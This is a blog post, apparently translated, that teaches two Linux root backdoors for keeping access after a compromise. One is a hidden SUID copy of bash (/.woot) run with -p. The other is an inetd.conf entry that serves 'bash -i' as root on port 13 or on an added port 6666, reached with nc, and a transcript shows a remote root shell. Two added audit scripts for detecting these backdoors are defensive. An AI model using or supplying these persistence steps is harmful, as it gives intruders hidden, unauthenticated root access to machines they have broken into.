Two Linux backdoor techniques (SUID shell and inetd backdoor)

Posted by lipsius at 2020-03-03
Premise: you already have root. You want to leave a backdoor so that you can get back in later.

System environment:

dawg:~# uname -a
Linux dawg 2.4.20-1-386 #3 Sat Mar 22 12:11:40 EST 2003 i686 GNU/Linux

1. SUID shell

Assuming you already know what the SUID bit does, first switch to root and run the following commands:

dawg:~# cp /bin/bash /.woot
dawg:~# chmod 4755 /.woot
dawg:~# ls -al /.woot
-rwsr-xr-x 1 root root 690668 Jul 24 17:14 /.woot

Of course, you can use a more inconspicuous name; I am sure you can come up with plenty of good ones. The leading dot in the file name is not required, it only hides the file (a name starting with "." is hidden from a plain directory listing, in any directory).

Now, as an ordinary user, let's try the backdoor:

fw@dawg:~$ id
uid=1000(fw) gid=1000(fw) groups=1000(fw)
fw@dawg:~$ /.woot
.woot-2.05b$ id
uid=1000(fw) gid=1000(fw) groups=1000(fw)
.woot-2.05b$

Huh? Why didn't that work?

Because bash 2 has a protective measure for SUID execution: when it starts with an effective UID different from the real UID, it drops the elevated effective UID. But this protection is not unbreakable:

.woot-2.05b$ /.woot -p
.woot-2.05b# id
uid=1000(fw) gid=1000(fw) euid=0(root) groups=1000(fw)

Use the -p parameter to get a root shell. euid is the effective user ID (the original post links to an explanation of the various IDs).

Note that when executing the SUID shell as an ordinary user, you must invoke it by its full path.

Tip: how to find files with the SUID bit set:

dawg:~# find / -perm +4000 -ls

This lists every file that has the SUID bit. (The "+4000" form is deprecated in current GNU findutils; use "-perm -4000" or "-perm /4000" there.)
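From the defender's side, the quickest check against this technique is the find command above combined with a checksum comparison: a SUID file whose contents are byte-identical to /bin/bash is a planted shell no matter what it is called or where it is hidden, and the "-p" trick only matters once such a file exists. The following script is an added example, not part of the original post. It audits a directory tree, using a constructed fixture in place of a live filesystem, and assumes POSIX sh with find, sha256sum, cut, awk and mktemp.

```shell
#!/bin/sh
# Added example, not from the original post: find SUID files under a
# directory and flag any whose checksum matches a known shell binary.

# List regular files under $1 that have the SUID bit set.
# "-perm -4000" is the current spelling of the post's "-perm +4000".
list_suid() {
    find "$1" -xdev -type f -perm -4000 -print 2>/dev/null
}

# Emit "sha256  path" lines for the shells we want to recognise.
# On a live host: known_shells /bin/sh /bin/bash > /tmp/known.txt
known_shells() {
    sha256sum "$@" 2>/dev/null
}

# For every SUID file under $1, print "SUSPECT <file> (copy of <shell>)"
# when its checksum appears in the known-shell list $2. Output only; the
# caller counts lines to decide whether anything was found.
# (Paths containing spaces are not handled; awk takes field 2 only.)
audit_suid() {
    dir=$1; known=$2
    list_suid "$dir" | while IFS= read -r f; do
        h=$(sha256sum "$f" | cut -d' ' -f1)
        # grep exits 1 on no match; head keeps the pipeline status at 0
        shell=$(grep "^$h " "$known" | awk '{print $2}' | head -n 1)
        if [ -n "$shell" ]; then
            echo "SUSPECT $f (copy of $shell)"
        fi
    done
}

# Constructed fixture (not a real system): a fake "shell" binary, a SUID
# copy of it hidden as /.woot, an unrelated SUID helper, and a non-SUID copy
# of the shell that must not be flagged. Prints the fixture directory.
make_fixture() {
    t=$(mktemp -d)
    mkdir -p "$t/root/bin" "$t/root/usr/bin"
    printf 'fake shell binary\n' > "$t/root/bin/bash"
    cp "$t/root/bin/bash" "$t/root/.woot"
    chmod 4755 "$t/root/.woot"
    printf 'some legitimate suid helper\n' > "$t/root/usr/bin/passwd"
    chmod 4755 "$t/root/usr/bin/passwd"
    cp "$t/root/bin/bash" "$t/root/usr/bin/copy_without_suid"
    known_shells "$t/root/bin/bash" > "$t/known.txt"
    echo "$t"
}

demo() {
    t=$(make_fixture)
    echo "SUID files under fixture:"
    list_suid "$t/root"
    echo "Audit result:"
    audit_suid "$t/root" "$t/known.txt"
    rm -rf "$t"
}
demo
```

On a real host run known_shells /bin/sh /bin/bash > /tmp/known.txt and then audit_suid / /tmp/known.txt as root. Also keep a baseline of list_suid output taken at install time: any new SUID file deserves a look, not only copies of shells. The fix for a planted file is to remove it or clear the bit with chmod u-s.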

2. Remote backdoor: using /etc/inetd.conf

Edit /etc/inetd.conf with vi.

Original file:

#chargen dgram udp wait root internal
#discard stream tcp nowait root internal
#discard dgram udp wait root internal
#daytime stream tcp nowait root internal

Revised to:

#discard stream tcp nowait root internal
#discard dgram udp wait root internal
daytime stream tcp nowait root /bin/bash bash -i

Enable it by forcing inetd to reload its configuration:

dawg:~# ps -ef | grep inetd
root 362 1 0 Jul22 ? 00:00:00 /usr/sbin/inetd
root 13769 13643 0 17:51 pts/1 00:00:00 grep inetd
dawg:~# kill -HUP 362

Now we can use nc to connect to the backdoor:

C:\tools>nc -vv 192.168.1.77 13
192.168.1.77: inverse host lookup failed: h_errno 11004: NO_DATA
(UNKNOWN) [192.168.1.77] 13 (daytime) open
bash: no job control in this shell
bash-2.05b# bash-2.05b#
bash-2.05b# id
uid=0(root) gid=0(root) groups=0(root)
bash-2.05b# uname -a
Linux dawg 2.4.20-1-386 #3 Sat Mar 22 12:11:40 EST 2003 i686 GNU/Linux

Tips:

A variation on this:

We can edit /etc/services and add the following line:

woot 6666/tcp  #evil backdoor service

Then add this line to /etc/inetd.conf:

woot stream tcp nowait root /bin/bash bash -i

You can also use a common port number instead to make it less conspicuous.
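On the detection side, both edits above leave a clear trace: an active (uncommented) inetd.conf entry whose server program is a shell, and, for the second variant, an extra line in /etc/services. The following script is an added example, not part of the original post. It audits an inetd.conf, resolving each flagged service to its port through a services file, with constructed sample files standing in for /etc/inetd.conf and /etc/services, and assumes POSIX sh with awk, grep and mktemp.

```shell
#!/bin/sh
# Added example, not from the original post: report inetd services that
# hand a shell to whoever connects, and show which port each one listens on.

# Look up the port for service $1 and protocol $2 in services file $3.
# Prints the port number, or "?" if the service is not defined there.
resolve_port() {
    awk -v svc="$1" -v proto="$2" '
        /^[[:space:]]*#/ || NF < 2 { next }
        {
            split($2, a, "/")            # "13/tcp" -> a[1]=13, a[2]=tcp
            if ($1 == svc && a[2] == proto) { print a[1]; found = 1; exit }
        }
        END { if (!found) print "?" }' "$3"
}

# Print "ALERT <service>/<proto> port <n> user <u> runs <program> <args>"
# for every active inetd.conf entry whose server program is a shell.
# inetd.conf fields: service socktype proto wait user program [args...]
audit_inetd() {
    conf=$1; services=$2
    # drop comment and blank lines, then split each entry into its fields
    grep -Ev '^[[:space:]]*(#|$)' "$conf" |
    while read -r svc stype proto wait user prog args; do
        case "$prog" in
            */sh|*/bash|*/dash|*/ksh|*/zsh|sh|bash)
                port=$(resolve_port "$svc" "$proto" "$services")
                echo "ALERT $svc/$proto port $port user $user runs $prog $args"
                ;;
        esac
    done
}

# Constructed sample files (not taken from a real host): the post's original
# daytime line stays commented out, the backdoored daytime entry and the
# invented woot service are active, and one harmless internal service is
# active too. Prints the directory holding both files.
make_fixture() {
    t=$(mktemp -d)
    printf '%s\n' \
        '#daytime stream tcp nowait root internal' \
        'echo stream tcp nowait root internal' \
        'daytime stream tcp nowait root /bin/bash bash -i' \
        'woot stream tcp nowait root /bin/bash bash -i' \
        > "$t/inetd.conf"
    printf '%s\n' \
        'echo 7/tcp' \
        'daytime 13/tcp' \
        'daytime 13/udp' \
        'woot 6666/tcp  #evil backdoor service' \
        > "$t/services"
    echo "$t"
}

demo() {
    t=$(make_fixture)
    audit_inetd "$t/inetd.conf" "$t/services"
    rm -rf "$t"
}
demo
```

On a real host run audit_inetd /etc/inetd.conf /etc/services; the "echo ... internal" entry is not reported, the two shell entries are, with their ports 13 and 6666. The same question applies to xinetd's /etc/xinetd.d/* files and to systemd socket units, where the server field has a different name: which listeners launch a shell, and as which user.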

Editor's note: in fact, the root password in /etc/shadow is the most secure one!

[via @ sy64 Peng / network security research team]